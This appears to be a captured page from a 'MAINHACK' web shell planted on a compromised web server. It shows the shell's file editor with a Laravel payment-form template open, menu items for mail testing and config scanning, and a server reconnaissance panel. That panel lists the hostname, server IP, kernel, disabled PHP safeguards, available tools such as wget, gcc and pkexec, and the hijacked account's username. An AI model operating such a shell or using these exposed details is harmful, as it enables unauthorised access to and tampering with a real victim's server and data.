[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: bfa198f8b4eb7ecf4cc700ed42074219.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="card"> <div class="card-header"> <span class="panel-title"><?php echo e(_lang('Add Offline Payment')); ?></span> </div> <div class="card-body"> <form method="post" class="validate" autocomplete="off" action="<?php echo e(route('subscription_payments.store')); ?>" enctype="multipart/form-data"> <?php echo e(csrf_field()); ?> <div class="row"> <div class="col-lg-12"> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('User')); ?></label> <div class="col-xl-9"> <select class="form-control select2-ajax auto-select" data-selected="<?php echo e(old('user_id')); ?>" data-table="users" data-value="id" data-display="email" data-divider="-" data-display2="name" data-where="2" name="user_id" required> <option value=""><?php echo e(_lang('Select One')); ?></option> </select> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Payment Method')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select" data-selected="<?php echo e(old('payment_method', 'Cash')); ?>" name="payment_method" value="<?php echo e(old('payment_method')); ?>"> <option value="Cash"><?php echo e(_lang('Cash')); ?></option> <option value="Cheque"><?php echo e(_lang('Cheque')); ?></option> <option value="Bank_Transfer"><?php echo e(_lang('Bank Transfer')); ?></option> </select> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Order / Transaction ID')); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" name="order_id" value="<?php echo e(old('order_id')); ?>" required> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Package')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select select2" data-selected="<?php echo e(old('package_id')); ?>" name="package_id" required> <option value=""><?php echo e(_lang('Select One')); ?></option> <?php $__currentLoopData = \App\Models\Package::active()->get(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $package): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($package->id); ?>"><?php echo e($package->name); ?> (<?php echo e(decimalPlace($package->cost, currency_symbol()).'/'.ucwords($package->package_type)); ?>)</option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Amount')); ?> (<?php echo e(currency_symbol()); ?>)</label> <div class="col-xl-9"> <input type="text" class="form-control float-field" name="amount" value="<?php echo e(old('amount')); ?>" required> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Status')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select" data-selected="<?php echo e(old('status', 1)); ?>" name="status" required> <option value="1"><?php echo e(_lang('Completed')); ?></option> <option value="0"><?php echo e(_lang('Pending')); ?></option> </select> </div> </div> <div class="form-group row mt-2"> <div class="col-xl-9 offset-xl-3"> <button type="submit" class="btn btn-primary"><i class="ti-check-box mr-2"></i><?php echo e(_lang('Submit')); ?></button> </div> </div> </div> </div> </form> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/acc.eliosof.com/resources/views/backend/admin/subscription_payment/create.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002